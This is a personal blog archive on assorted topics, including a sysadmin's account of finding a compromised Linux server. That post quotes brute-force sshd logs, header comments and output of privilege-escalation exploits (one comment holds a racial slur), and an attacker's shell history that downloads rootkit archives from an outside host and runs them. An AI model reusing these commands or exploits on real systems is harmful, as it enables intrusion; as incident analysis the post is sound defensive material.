It takes a lot longer to 'administrate' this way, but the extra time you put in at the beginning pays off. I've been setting up a group of machines for a client with cfengine, setting up packages and making configuration changes as needed, all from a central location. I'm not quite to the point where I don't have to even log in to other systems, but for many tasks I don't. What's also great is I was able to test how well my 'converging' setup worked. A new server was brought online, and needed to be just like the others. After installing cfengine and letting it go, it worked pretty well, with only minor issues.
I believe we need to move away from fixing systems and instead work on making systems fix themselves. It's more than just automation, it's predicting failures and coming up with solutions. cfengine is a step in that direction, towards an immunological system applied to computers. When you start talking about hundreds of servers, you don't want to ever have to log in to any of them. The more 'intelligent' I can make the servers I set up, the better.
In fact I am almost against even setting up monitoring for them. I don't want to be paged or even notified about some server Apache process that died. I want it to restart the process. The less I know the better. We sysadmins need to stop being mechanics and start designing systems that react to change and fix themselves.
Ahh, but we don't live in an ideal world. Anyhow, any steps that can be made towards this goal I think are good ones. cfengine is really cool in its ability.
I recently posted a question to the cfengine mailing list, and seemed to have started a storm about whether a system's hostname should be a FQDN. I did however get my question answered in all that hoopla.
There's a great song by Richard Ashcroft. I thought I would post the lyrics:
(Check the meaning)
When I'm low, and I'm weak, and I'm lost
I don't know who I can trust
Paranoia, the destroyer, comes knocking on my door
You know the pain drifts to days, turns to nights
But it slowly will subside
And when it does, I take a step, I take a breath
And wonder what I'll findCan you hear what I'm saying?
Got my mind meditating on love, love
Feel what I'm saying
Got my mind meditating on love, love(The human condition)
(The human condition)Too much blood, too much hate, turn off the set
There's got to be something more
When Mohammed, Allah, Buddah, Jesus Christ
Are knocking down my door
I'm agnostic getting God, but man
She takes a female form
There's no time, no space, no law
We're out here on our ownCan you hear what I'm saying?
Got my mind meditating on love, love
Feel what I'm saying
Got my mind meditating on love, love[Check the meaning]
[The human condition]
[Check the feeling]
[The human condition]Guess it's life, doing it's thing
Making you cry, making you think
Yeah life, dealing it's hand
Making you cry and you don't understand
Life, doing it's thing
Making you cry now, making you think of
Pain, doing it's thing
Making you cry yeah, making you singDon't say it, don't say it's too late
Don't, don't say it's too late (It's never too late, it's never too late)
Don't, don't say it's too late (It's never too late)
Don't, don't say it's too lateThe human condition, the big decisions
The human condition, the big decisionsI'm like a fish with legs, I fell from the tree
I made a rocket (check the meaning), I made a wheel
I made a rocket (check the feeling), I swam the ocean (check the meaning)
I saw the moon (say a prayer), I seen the universe (and beyond)
I see you (check the feeling), I see me (check the meaning)
That's my reality
And while the city sleeps we go walkingIt's a beautiful world
And when the city sleeps we go walking
We find a hole in the sky and then we start talking
And then we say "Jesus Christ, Jesus Christ, Jesus Christ
Buy us some time, buy us some time"
Hear what I'm saying
Can you hear what I'm saying?
Can you hear what I'm saying?
Can you hear what I'm saying?It's gonna be alright
So I just had a 2nd Anatomy exam and am fairly sure I got an A on it. I studied so many diagrams that were not even on the test. The only thing they put was a pelvis and baby skull, and we had to know all of the parts. There were 2 questions that got me a bit. One was similar to:
What are bones made of?
A. water, proteins, and calcium salts
B. hydroxyapatite
C. All of the above
It had to be either B or C, because I know that proteins, calcium salts, and hydroxyapatite are all part of bones. But the water part got to me. When I see such questions I think they are trick questions, and there are many compounds with water that are not liquid. Alas I picked B which I think is correct.
Usually when I take tests I also look for clues in one question that may help another. For example here was one:
From what are the skull bones formed?
A. endochondral tissue
B. dermal tissue
C. cartilage
Now I didn't have a good idea what endochondral tissue was, but then I thought about the etymology. Endo of course means within. Chondro I knew had something to do with cartilage, because there are cells like chondrocytes, chondroblasts, and chondroclasts that all have to do with cartilage formation. So endochondral means within cartilage, and so neither A nor C could be the answer. It had to be B. This then helped me with another question similar to:
Dermal tissue forms from neural crest cells. What are other aspects of dermal tissue?
A. also known as endochondral
B. used for bone replacement
C. preceded by a template of cartilage
D. not preceded by a template of cartilage
E. all of the above
Of course E is ruled out because C and D contradict each other (this professor likes to do that a lot, which is helpful). From previous questions I knew that endochondral is equivalent to cartilage, so it could not be A or C. So the only choices left were B and D. From the previous question I determined skull bones are formed from dermal tissue, so that hinted this was not used for bone replacement. I also knew a bit about fracture healing, and it involves cartilage. So the answer had to be D. Also 'neural crest' hints towards the skull question above.
So throughout the test, I am sort of learning things for other questions, and going back and forth. I know at this point that dermal tissue forms without cartilage and is the basis for the skull. Then I come across this question:
Which of the following bones form from dermal tissue?
A. clavicle
B. femur
C. humerus
D. all of the above
I can infer from previous questions that the limb bones definitely do not form from dermal tissue, because I know that a fracture of a limb involves cartilage formation. The only possible choice was the clavicle, which makes sense. The clavicle is a very weak bone and the whole pectoral girdle is very movable, so I imagined it forming within soft tissues.
Other than that the rest of the 54 questions were pretty painless.
I wonder what 1st person shooter that kid is playing in the background.
So I'm logged into a client's Linux system and see a bunch of 'uselib24' processes running by a user 'tester' and taking up all the CPU. Immediately I knew it was hacked.
It turned out this 'tester' was a valid account with a very easy to guess password, and this is how they got in:
... tons of SSH attempts from 194.57.119.197
Nov 2 16:39:03 server sshd[13998]: Failed password for illegal user fax from 194.57.119.197 port 57895 ssh2
Nov 2 16:39:03 server sshd[14000]: Illegal user fax from 194.57.119.197
Nov 2 16:39:07 server sshd[14000]: Failed password for illegal user fax from 194.57.119.197 port 57995 ssh2
Nov 2 16:39:12 server sshd[14002]: Failed password for tester from 194.57.119.197 port 58116 ssh2
Nov 2 16:39:12 server sshd[14004]: Accepted password for tester from 194.57.119.197 port 58213 ssh2
Then later in the logs, tester comes in from a different IP:
Nov 2 20:41:42 server sshd[14574]: Accepted password for tester from 62.162.20.93 port 3132 ssh2
So I check what processes this user is running. I see that he is running screen, and these 'uselib24' processes. Wondering where he ran these from, I just went to /proc/PID and looked at the cwd symlink. It's linked to /var/tmp/.a. I look in there and see all sorts of rootkit exploits, one of them being this uselib24. He even has the C code uselib24.c, and it looks like:
/*
* Linux kernel 2.4 uselib() privilege elevation exploit.
*
* original exploit source from http://isec.pl
* reference: http://isec.pl/vulnerabilities/isec-0021-uselib.txt
*
* I modified the Paul Starzetz's exploit, made it more possible
* to race successfully. The exploit still works only on 2.4 series.
* It should be also works on 2.4 SMP, but not easy.
*
* thx newbug.
*
* Tim Hsu Jan 2005.
....
Let's see, what else. There is a k-rad.c. What's that look like?
/*
* k-rad.c - linux 2.6.11 and below CPL 0 kernel exploit v2
* Discovered and exploit coded Jan 2005 by sd
*
* In memory of pwned.c (uselib)
And then ex_perl2b.c:
/*
* Copyright Kevin Finisterre
*
* Setuid perl PerlIO_Debug() overflow
*
* Tested on Debian 3.1 perl-suid 5.8.4-5
*
* (11:07:20) *corezion:* who is tha man with tha masta plan?
* (11:07:36) *corezion:* a nigga with a buffer overrun
* (11:07:39) *corezion:* heh
* (of course that is to the tune of http://www.azlyrics.com/lyrics/drdre/niggawittagun.html)
*
* cc -o ex_perl2 ex_perl2.c -std=c99
*
* kfinisterre@jdam:~$ ./ex_perl2
* Dirlen: 1052
* Charlie Murphy!!!@#@
* sh-2.05b# id
* uid=1000(kfinisterre) gid=1000(kfinisterre) euid=0(root)
*
*/
A nice collection of recent exploits. I honestly haven't been keeping up with Bugtraq. There are some other binaries with no source code. I'm able to actually 'screen -r' his session. It's running the uselib24 process, crunching away at trying to find a buffer overflow address. I wanted to use screen's scrollback buffer to get some history, but accidentally did a 'pkill -9 -u tester' in another window. So I only saw the last few things he did:
[tester@server .a]$ chmod 9x uselib24
chmod: invalid mode string: `9x'
[tester@server .a]$ chmod +x uselib24
[tester@server .a]$ ./uselib24
[+] SLAB cleanup
child 1 VMAs 29608
child 2 VMAs 1132
child 3 VMAs 124
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xc0400000 - 0xc04f97de
Wait... /
~/.bash_history shows some more:
exit
w
uname -a
/sbin/ifconfig
iptables -L
cd /var/tmp
mkdir -p .a
cd .a
wget radovis.com/images/new.tgz
tar zxvf new.tgz
chmod +x hator
wget radovis.com/images/k.zip
unzip k
chmod +x hator
./hator
chmod +x pwned
./pwned
chmod +x a
./a
chmod +x modprobe
./modprobe
./pwned
./a
screen -v
ps -x
ps -aux
screen -v
screen
screen -r
ls -al
chmod 9x uselib24
chmod +x uselib24
So you see he downloaded rootkits from http://www.radovis.com/images/.
Doesn't appear he was able to get root access. Luckily this server is being phased out anyway. Wee, the fun of finding hackers... yawn.
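The pattern in the sshd log above (a run of failed passwords, then an accepted one from the same address, then the same account used from a second address) can be flagged automatically. This is an added example, not something from the original post; the function names, the finding labels and the threshold of 3 failures are assumptions, and the sample lines are the ones quoted above.

```python
import re
from collections import defaultdict

# sshd lines quoted from the post above (syslog format, no year).
SAMPLE_LOG = """\
Nov 2 16:39:03 server sshd[13998]: Failed password for illegal user fax from 194.57.119.197 port 57895 ssh2
Nov 2 16:39:03 server sshd[14000]: Illegal user fax from 194.57.119.197
Nov 2 16:39:07 server sshd[14000]: Failed password for illegal user fax from 194.57.119.197 port 57995 ssh2
Nov 2 16:39:12 server sshd[14002]: Failed password for tester from 194.57.119.197 port 58116 ssh2
Nov 2 16:39:12 server sshd[14004]: Accepted password for tester from 194.57.119.197 port 58213 ssh2
Nov 2 20:41:42 server sshd[14574]: Accepted password for tester from 62.162.20.93 port 3132 ssh2
"""

# The user name is text supplied by the client. Matching it greedily and
# anchoring at end-of-line takes the address from the final
# "from <ip> port <n>", which is the part sshd writes itself.
EVENT_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+[\d:]{8})\s+\S+\s+sshd\[\d+\]:\s+"
    r"(?P<result>Failed|Accepted) password for "
    r"(?:(?:illegal|invalid) user )?(?P<user>.+) "
    r"from (?P<ip>\S+) port \d+(?: ssh\d*)?\s*$"
)


def parse_events(text):
    """Yield (timestamp, result, user, ip) for each password auth line."""
    for line in text.splitlines():
        m = EVENT_RE.match(line)
        if m:
            yield m["ts"], m["result"], m["user"], m["ip"]


def find_suspicious_logins(text, min_failures=3):
    """Flag accepted logins that follow a run of failures from the same IP,
    and later logins to the same account from a different IP."""
    failures = defaultdict(int)     # ip -> failed attempts seen so far
    names_tried = defaultdict(set)  # ip -> user names it has tried
    guessed = {}                    # user -> ip that guessed the password
    findings = []
    for ts, result, user, ip in parse_events(text):
        if result == "Failed":
            failures[ip] += 1
            names_tried[ip].add(user)
            continue
        if failures[ip] >= min_failures:
            guessed.setdefault(user, ip)
            findings.append({
                "kind": "password_guessed", "time": ts, "user": user, "ip": ip,
                "prior_failures": failures[ip],
                "names_tried": sorted(names_tried[ip]),
            })
        elif user in guessed and ip != guessed[user]:
            findings.append({
                "kind": "login_from_new_ip", "time": ts, "user": user, "ip": ip,
                "first_seen_from": guessed[user],
            })
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_logins(SAMPLE_LOG):
        print(finding)
```

On a real auth log the threshold would be set well above 3, since a mistyped password produces a few failures on its own.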
Bookpool is having its annual 47% off sale on O'Reilly books. Go grab some.
A while ago I bashed this exercise machine called the ROM that touted a 4-minute workout. Reading through their site they actually have some valid points. Check out this video of the 'device'.
Here is an excellent article on the risks of antibiotics. Some quotes:
The most disturbing is Salyers's discovery that antibiotics like tetracycline actually stimulate Bacteroides to begin swapping its resistance genes. "If you think of the conjugative transfer of resistance genes as bacterial sex, you have to think of tetracycline as the aphrodisiac," she says.
Also amazing is how much bacteria can actually affect fat storage:
Fredrik Backhed ... has caught B. theta sending biochemical messages to host cells in the abdomen, directing them to store fat. When he gave germ-free mice an infusion of gut bacteria from a conventionally raised mouse, they immediately put on an average of 50 percent more fat although they were consuming 30 percent less food than when they were germ-free. "It's as if B. theta is telling its host, 'save this--we may need it later' ...
So this past week or so I've been pretty bored. With school out it is rather lame. I decided to torture myself further and try hacking again at making an IMAP interface to Gmail.
I didn't really get much further along, but I did manage to get it working with Thunderbird:
I don't really recommend using this at all. It's more of a proof of concept and something to keep me busy. The code is absolutely horrible. It fetches ALL mail from your Gmail inbox at startup no matter what. I found that the hardest thing for me to do and what took the most time (and probably is buggy as hell) was trying to parse a string such as:
a0004 FETCH 1:1 (UID FLAGS INTERNALDATE RFC822.SIZE BODY.PEEK[HEADER.FIELDS (DATE FROM SUBJECT TO CC MESSAGE-ID REFERENCES CONTENT-TYPE IN-REPLY-TO REPLY-TO LINES X-LABEL)])
The parentheses and brackets can be nested, so above might also have '.. FLAGS (\Seen) ..' etc. That's what makes this difficult. I'd appreciate any algorithms. I also got to see how the various IMAP clients work. I found that mutt is the cleanest IMAP client. I could not get it working with Apple Mail and may try again later. I probably spent more time looking at tcpdumps when sane people would look at the IMAP RFC. Go here if you are feeling brave. Don't blame me if you lose all your mail. I don't see how that can happen, but you've been warned.
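One way to handle the nesting described above is a single pass with an explicit stack, where '(' opens a list and '[' opens a section attached to the atom just before it. This is an added example, not the code from the original project; the function names, the output shape and the depth limit are assumptions, and it covers single-line commands without IMAP literals ({n} followed by raw bytes).

```python
# FETCH line quoted from the post above.
FETCH_LINE = (
    "a0004 FETCH 1:1 (UID FLAGS INTERNALDATE RFC822.SIZE "
    "BODY.PEEK[HEADER.FIELDS (DATE FROM SUBJECT TO CC MESSAGE-ID REFERENCES "
    "CONTENT-TYPE IN-REPLY-TO REPLY-TO LINES X-LABEL)])"
)

MAX_DEPTH = 16            # the input comes from the network: bound the nesting
CLOSER = {"(": ")", "[": "]"}
DELIMS = ' ()[]"'


class IMAPSyntaxError(ValueError):
    pass


def parse_args(text):
    """Parse IMAP arguments into nested values: atoms and quoted strings
    become str, (...) becomes a list, ATOM[...] becomes (ATOM, list)."""
    root = []
    stack = [(root, None)]          # (container being filled, expected closer)
    i, n = 0, len(text)
    while i < n:
        ch = text[i]
        current = stack[-1][0]
        if ch == " ":
            i += 1
        elif ch in CLOSER:
            if len(stack) > MAX_DEPTH:
                raise IMAPSyntaxError("nesting too deep")
            child = []
            if ch == "[":
                # A section must directly follow an atom, as in BODY.PEEK[...]
                attached = (current and isinstance(current[-1], str)
                            and i > 0 and text[i - 1] not in DELIMS)
                if not attached:
                    raise IMAPSyntaxError("'[' without a preceding atom")
                current[-1] = (current[-1], child)
            else:
                current.append(child)
            stack.append((child, CLOSER[ch]))
            i += 1
        elif ch in ")]":
            if stack[-1][1] != ch:
                raise IMAPSyntaxError("unexpected %r at offset %d" % (ch, i))
            stack.pop()
            i += 1
        elif ch == '"':
            j, buf = i + 1, []
            while j < n and text[j] != '"':
                if text[j] == "\\":     # backslash escapes the next character
                    j += 1
                if j < n:
                    buf.append(text[j])
                j += 1
            if j >= n:
                raise IMAPSyntaxError("unterminated quoted string")
            current.append("".join(buf))
            i = j + 1
        else:
            j = i
            while j < n and text[j] not in DELIMS:
                j += 1
            current.append(text[i:j])
            i = j
    if len(stack) != 1:
        raise IMAPSyntaxError("missing %r" % stack[-1][1])
    return root


def parse_command(line):
    """Split 'tag COMMAND args...' and parse the arguments."""
    parts = line.rstrip("\r\n").split(" ", 2)
    if len(parts) < 2:
        raise IMAPSyntaxError("expected a tag and a command")
    rest = parts[2] if len(parts) == 3 else ""
    return parts[0], parts[1].upper(), parse_args(rest)


if __name__ == "__main__":
    print(parse_command(FETCH_LINE))
```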
Apache has an interesting option for mass virtual hosting. The problem is in the way that logfiles are dealt with. You can't have separate logfiles for each virtual host, and they recommend using a log processing script to separate them. What is also rather lame is you cannot split up error logs no matter what. It's rather silly that this module is for 'mass' hosting and yet they expect users to want all of the error logs in one file that cannot be linked to a virtual host.
Anyhow, cronolog doesn't support virtual host info in the access log, so I figured I would try to write my own script that would do what I need. I didn't know how much it would involve, but surprisingly very little, and there begat pythonolog. I got most of cronolog's functionality in a very few lines of code. It's definitely not as efficient though. It would be used basically like this:
LogFormat "%V %h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
CustomLog "|/path/to/pythonolog.py /my/logs/%Y/%m-%d-%VHOST-access_log" combined
It accepts all the standard strftime formats, as well as %VHOST which would be the virtual host (first field on line). I made it so that a configurable maximum number of logfiles stay open. When that limit is reached, old logs that haven't been written to in a while are closed. This keeps the file descriptor count reasonable.
Go grab it here if interested. I honestly haven't even tested it yet so good luck heh.
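The design described above (a strftime path template with a %VHOST placeholder, plus a cap on open logfiles with the least recently written one closed first) fits in a short class. This is an added example and not the pythonolog source; the class and function names and the 'invalid-vhost' bucket are assumptions. Because the first field is a host name taken from the request as Apache logged it, the example treats it as untrusted and validates it before it becomes part of a file path.

```python
import os
import re
import sys
import time
from collections import OrderedDict

# Letters, digits, dots and hyphens only: nothing that can act as a path separator.
SAFE_VHOST = re.compile(r"[a-z0-9](?:[a-z0-9.-]{0,253}[a-z0-9])?")


def clean_vhost(raw):
    """Normalise the logged host name; anything unexpected shares one bucket."""
    host = raw.strip().lower().rstrip(".")
    if ".." in host or not SAFE_VHOST.fullmatch(host):
        return "invalid-vhost"
    return host


class LogRouter:
    """Append each line to a per-vhost file, keeping at most max_open files open."""

    def __init__(self, template, max_open=64):
        self.template = template
        self.max_open = max_open
        self.handles = OrderedDict()  # path -> open file, least recently used first

    def path_for(self, vhost, when):
        # Expand the strftime codes in the pieces around %VHOST separately, so
        # strftime never sees "%V" (the ISO week number on many platforms) and
        # never interprets anything inside the host name.
        parts = self.template.split("%VHOST")
        return vhost.join(time.strftime(p, when) if p else "" for p in parts)

    def write(self, line, when=None):
        vhost = clean_vhost(line.split(" ", 1)[0])
        path = self.path_for(vhost, when or time.localtime())
        fh = self.handles.pop(path, None)
        if fh is None:
            if len(self.handles) >= self.max_open:
                # Evict the file that has gone longest without a write.
                _, oldest = self.handles.popitem(last=False)
                oldest.close()
            os.makedirs(os.path.dirname(path), exist_ok=True)
            fh = open(path, "a", encoding="utf-8", errors="replace")
        self.handles[path] = fh  # re-insert at the most recently used end
        fh.write(line if line.endswith("\n") else line + "\n")
        return path

    def close(self):
        while self.handles:
            self.handles.popitem()[1].close()


if __name__ == "__main__":
    # Used as a piped log program: script.py /my/logs/%Y/%m-%d-%VHOST-access_log
    router = LogRouter(sys.argv[1])
    try:
        for entry in sys.stdin:
            router.write(entry)
    finally:
        router.close()
```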
Some interesting pages provided by FPL:
The outage maps are especially interesting.
Well things are somewhat improving here, but it's dangerous to drive. Many major intersections have no traffic lights. Going through these intersections is not fun. With so many trees blown down it looks like a wasteland outside. Power is still out to many areas, and the lines to gas stations are huge. I am only driving minimally, and have about a half tank of gas left. Cabin fever is setting in. I saw 'The Shining' last night, but I am not at the Jack Torrance stage yet. What an amazing movie btw, it's such a masterpiece of filmmaking. It played on A&E and what kinda sucked is it ran from 8 to 11:30pm with commercials!
Speaking of commercials, I am really appalled at the number of prescription medicine commercials on television. It is really getting out of hand. I think I saw at least one for every commercial break on A&E between 8 and 11:30pm. I also see a new tactic in these ads. In the past there were always disclaimers saying you may vomit, get an erection for 8 hours, die, etc. Now they are almost gone, and instead they show some text in the commercial such as 'See our ad in Health magazine.' I am not sure, but it seems to me they are exploiting a loophole to not mention any side effects during the commercial.
Here is an interesting critique by a doctor on the med business. Sorry I think you need a subscription to Discover to read this. A quote:
These ads drive a wedge between doctor and patient. For a while, I was both a family practitioner and a researcher, and I knew as much about the real data behind Vioxx and Celebrex as anybody. I knew they were neither safer nor more effective than the much less expensive alternatives and would tell my patients so. Nonetheless, many still demanded these drugs, which shows the tremendous power of marketing.
If you don't believe your doctor, I feel sorry for you. It's a shame that someone can think themselves more knowledgeable on medicine after watching a 30-second commercial. Is 30 seconds going to outweigh 8+ years of education that a doctor goes through to become a doctor? What's also very sad from that article:
Drug companies are also sponsoring about 70 percent of the continuing education that doctors are required to participate in to keep their licenses to practice.
I had a strange dream last night about viruses. Not the computer kind, but biological. First a little background.
Viruses are essentially proteins. The ones that the body can fight have antigens, which are identifiers that the body recognizes as non-self. The body generates antibodies that 'fit' and bind to these identifiers and render the virus, and protein, inactive. Vaccines are created by introducing a version of the virus that may be biologically inactive or not powerful enough to cause major damage, or even something that may resemble the real virus. The body can then make the antibodies that will later take care of a real threat. Of course this does not work for the viruses that mutate and therefore make the existing antibodies useless.
I had a weird dream about a virus that depended on antibodies for survival. That is, it required the body to attack it in order for it to succeed. It was like a virus encased in a shell of proteins that the body does recognize as non-self, and therefore attacks. But attacking it actually opened the shell and let the real virus out, which was not recognizable by the host and did not have antigens. It was sort of like flak deployed by the virus in order to trick the immune system, but it actually depended on the immune system to spread.
I'm not sure if there is such a virus. In my dream the word 'diablo' kept coming up for some reason, heh. No idea why. I just thought I would blog this in case it came in useful later.
When we think of the phrase 'survival of the fittest' and natural selection, we usually think of it in terms of animals or live organisms in general. But it goes deeper than that. Here's a great excerpt from Lehninger's Biochemistry book (written in 1975 no less):
Why should living organisms have selected the specific types of organic molecules they now possess? Why should 20 alpha-amino acids be the building blocks of all proteins in all organisms? Why not only 10? Why not 40? Why are they all alpha-amino acids? Couldn't we equally well construct large "protein" molecules from amino acids having their amino groups in the beta positions? Why are the purines adenine and guanine and the pyrimidines cytosine and thymine, out of the dozens of purine and pyrimidine derivatives known, the essential building blocks of DNA in all species? Much evidence supports the concept that the biomolecules we know today were selected from a much larger number of available organic compounds. Actually, several hundred different organic compounds have been isolated from simulated primitive-earth experiments on the abiotic origin of organic molecules like those described above. Since only a small number of different organic compounds may have been required to form the earliest biostructures capable of survival, it appears very likely that a process of selection took place.
Think about the formation of the first 'cell', the beginnings of life. The right molecules had to come together in the right way to create the cell membrane that separates a self from a non-self. Think of how many trials and errors were made throughout evolutionary history before that first cell evolved, how many molecules tested and deemed unfit to do the job.
Evolution is a theory that not only applies to the ape-to-human transformation which seems to be its most visible controversy, but also applies to the abiotic to biotic transformation as well, of inanimate to animate from an atomic and molecular standpoint. The theory of evolution ultimately says that you have come from that which is not living.
It's amazing to think about this. Was it just luck that the right combination of molecules came together after millions of years, maybe with that spark of lightning, and there began life as we know it? The idea of God always comes into this debate. There is a guy named Richard Dawkins that basically lashes out at scientists that believe in God. He simply says they are idiots and not true scientists. The recent Discover magazine has readers writing in defending him, as well as denouncing him.
In some ways I agree with the evolutionary perspective. I believe there is too much evidence to deny that we evolved from lower animals. I think that a person who denies this, denies science, medicine, and all things that such fields depend on. Just from a genetic standpoint it is hard to prove that we are not related in some way to apes.
But does that mean I must not believe in God? No. It means that I don't believe there is a God that has created us in his own image. I don't believe there is a way for science to prove the existence of God, and neither is there a way to disprove existence. There is no way to even disprove God's nonexistence. If you say evolution created us, fine. So who created evolution? What created that first cell, and why? Or go back even further, why was our universe created? These questions just cannot be answered by science.
I wouldn't even say that I am agnostic. Because there are certain things that happen in life that I believe are through some sort of divine hand. There is a feeling, and a faith in something, but I just do not know what, and I may never know. Just think of all the great things faith has achieved (even in science). I think we would not have excelled so far without that faith in a higher being. Science is definitely not my God. But neither is the human form divine. I believe there is a creator of the universe, and it is something that I most likely cannot even begin to comprehend. But I believe it is there nonetheless, waiting for me to believe.
All right, maybe some of you are wondering how things are going with the storm. I've been out of power for the past few days and didn't have any internet access. Pretty much all of my area was out of power, so no internet cafes either. It's rather dangerous on the roads too, because all traffic lights are either gone, broken, or powerless. To top that, it's very difficult to find gas due to most gas stations not having generators and not being able to function without power.
I'm pretty grateful we got power back so soon, as I've been hearing on the radio that it could take up to 4 weeks. I believe there are many areas still out.
So let's see, where to begin. I stay in a townhouse that really didn't get any damage. Outside is a mess though. Huge trees have been toppled over, and when they do you can see the roots spread out like a pancake. It shows that those trees have little foundation in the ground, and the roots grow horizontal rather than vertical. But most of the palm trees stayed up, and I believe those roots grow deep. The ones that did go down mostly broke in half. Maybe I did learn something from my Biodiversity class and all that plant bullshit.
The trees are all mangled with the power lines. The next few days with no power is when the cabin fever sets in. Everyone comes outside. I saw a mom and her two children riding bikes with helmets. There was a downed power line and they just strolled right over it. I thought that was very funny to make your child wear a helmet for safety and then casually ride over a powerline. If there is any good that came out of this it's getting people out of their house. I think that we rely too much on television for entertainment, and while I walked outside it was nice to see kids actually playing in the lawn among the down trees. Nights were completely pitch black, and starlight the only source of light. The brightest thing in my room was my breathing Powerbook light which was trying to get those last few gasps of breath before suffocation.
It was nice to hear the sound of nature outside. Wait, those aren't insects, that's the strange harmonics of 4 or 5 generators running! So much for nature..
My fridge needs to be emptied. I'd venture to say that there must be a lot of Americans that gain weight after a hurricane or power outage, a 'hurricane weight gain'. That's when you have to eat all the food before it spoils, and it's mostly junk food. I tried to exercise daily though just to keep in shape. Cold showers were not fun either. I found that the best way to take a cold shower is to exercise right before, so you get warmed up. I heard a lady on the radio come up with an interesting method of taking a hot shower. She unrolled her garden hose filled with water on the lawn during the day for a few hours. The water in the hose became very warm, and she used it to shower.
One thing that really bothered me was the appalling cell phone service. In my case it was Cingular, but I heard many others sucked as well. My home phone was dead too.
But things are sort of coming back to normal now. It was a fun ride, and I know people had it much worse. I'm grateful I had a place to stay, food to eat, water, etc.
Here is probably the closest equivalent to Rails for Python. What's very interesting is the 20-min demo on their site that shows how to create a wiki from scratch with TurboGears. It's definitely not as elegant as Rails, but it's still cool if you want to stay with Python. That programmer in the demo is pretty impressive, though he's probably had lots of experience with TurboGears.
I was thinking of seeing North Country or Capote this weekend, but as usual ended up seeing something else. I don't know, I think I wanted to see a movie that required little 'thought', so that narrowed down to Doom or Stay. I decided on Stay because it sounded like it had some cool cinematography and Doom got horrible reviews.
So how was Stay? The only way I can review it is by spoiling it, so here there be spoilers...
Let's see, how can I describe this movie... think The Sixth Sense crossed with The Usual Suspects, only not as good, and no 'The' in the title. It's OK, and interesting at times. Basically, it is one director's vision of what the last few moments of death must be like. Scientifically, I would agree that this is probably a very good hypothesis of what the brain does at the time of death. The mind seeks to resolve all that it could not resolve in life, so that it may rest forever. Ultimately the person wants to be forgiven, and that was the running theme of this movie.
I had seen Ryan Gosling in The Believer, which was an absolutely amazing true story about a Jew who hates himself so much that he joins the KKK. In this movie again he is fighting internal demons. Guilt and conscience is a bitch.
I'll save you 1 hour and 48 minutes: the whole movie is a dream, a fabrication based on people the main character sees around him during his last few minutes of life. I found it really interesting because you can tell that the mind works in this way sometimes. You create your own drama, and stories that are far from reality. In such a panic situation, it is conceivable that your mind would take this to the extreme.
Probably the coolest thing about this movie (and the main reason I went to see it), was the cinematography. It's conveyed just like a dream, with transitions between scenes happening as they occur in dreams. There are strange ticks and nonsensical things, like people swapping places in a scene as they walk behind a pillar. They are subtle, but you notice them. Another scene had triplets of everything throughout the scene, but I could not figure out why. The director did a very good job conveying the near-death experience. But it's rather pretentious, and too moralistic. I'm just glad that the main character did in fact die, and it did not end with some Hollywood crap.
Go see it if you're interested in this stuff and effects; other than that, you might want to wait until it comes on cable.
So I'm reading through a really good Rails programming book. I'll be installing it for a client so I figure the more I know about the language the better.
The book says to create a new scaffold for its first sample application with the command:
ruby script/generate scaffold Product Admin
And as usual I am lucky enough to have problems at this stage. That's supposed to give me a web page I can use to view a MySQL shopping cart. But whenever I went to the URL I would get a 'Recognition failed' error. Not knowing anything about Ruby or Rails, I had no clue what this meant, so I'm searching logfiles, wondering whether there is a problem with my database setup, etc.
Searching on google led to an errata page for the Agile programming book, which seemed to indicate this issue. Of course the site has to be down and the google cache useless so I get nothing out of this.
After doing some reading, I found out that the above command is supposed to create an Admin controller of type Product. But it wasn't doing that, and instead creating a 'products' controller and ignoring the Admin argument altogether. So the recognition failed message means it couldn't find the controller. After about 30 min of searching the web, it turns out I came across a bug that was fixed 10 hours ago.
I was using rails version 0.14.1, which has this problem, and it's suggested to go down to 0.13 or the development code. After going to 0.13.1 (via 'gem install rails --version 0.13.1'), and removing the new version, things worked ok. Ahh the joys of version hell. Don't get me wrong, Rails looks very cool, but these types of issues remind me of all the problems associated with Java versions. I understand Rails is under heavy development, and I should probably stick to older versions. But with things such as 'gem install rails' installing something broken, how could I know?
Oh well, I got this working and will continue my Rails adventure later.
I thought it was interesting to find out that polio affected the rich people more than the poor. It has to do with how the disease is transmitted and immunity.
As kids grew up in poor conditions, they came in contact with feces that spread polio. However, at a young age, the body can develop an immunity to the disease. In contrast, the rich kids were 'cleaner' and were never exposed to the virus. This cleanliness led them to be more susceptible to the disease, and the poor unknowingly vaccinated themselves.
So there is something to be said of living in dirty or rough conditions. Your body may be tougher to certain pathogens.
I heard recently in the news the story about anti-bacterial soap being bad for you. Normal soap works by binding to bacteria and it being physically scrubbed off. Anti-bacterial soap works differently, by interfering with bacterial growth itself and killing the bacteria. So what's the problem? Bacteria are great at coming up with resistance. So there is fear that we are actually making the bacteria on us stronger by using such soaps.
Here's a great blog written by a doctor doing his residency. He's always got some interesting stories on there.
My college has a 'Lifelong Learning' school which is mainly for elderly wanting to learn new things and exercise their brain. The brain really falls into the category of 'use it or lose it', so I think it's great to see people wanting to learn. It can only be beneficial to your health and mind. I've always felt that if I'm not learning anything new, my life seems sort of at a standstill, like I'm not going anywhere. I think academia is really where I should be, and who knows, maybe I will end up in a research or teaching hospital.
I came across The Teaching Company, which gets good professors to teach courses in an overview/introductory format on DVD. You're not going to get a medical degree watching these, but it's great to spark your interest and provides good general knowledge. I'm watching the Anatomy lecture series, which consists of 32 45-minute lectures. They have courses in many different topics, so go check them out. Some are rather expensive, but sometimes they have sales in which there are reasonable prices.
When fertilization occurs in humans, the cell growth of the zygote is called indeterminate radial cleavage. The interesting part of this is 'indeterminate'. What this means is if you take a piece of that growing ball of cells off, and implant it into the uterus, it will grow into another human. That's how identical twins are formed, and is nature's cloning technique. It's called indeterminate cleavage because the cells are not specialized and are not 'determined' to be certain tissues until later in development.
What I wonder is, let's say you take a piece of the growing cells, to start another growth of cells (a twin). Then you take a part of the twin cell, and then a part of the part you take off, etc., recursively. Since the cells do not have time to specialize, can you essentially create an unlimited number of humans (i.e. clones) from that one fertilized egg? It's almost like you are creating more life without fertilization: parthenogenesis. We are already moving towards creating artificial uteruses, so can you imagine the impact of being able to 'grow' humans like this?
7th Day Adventist - He who plays with his toys on Saturday, loses.
Agnosticism - It is not possible to know whether toys make a bit of difference.
Amish - Toys with batteries are surely a sin.
Anglican - They were our toys first.
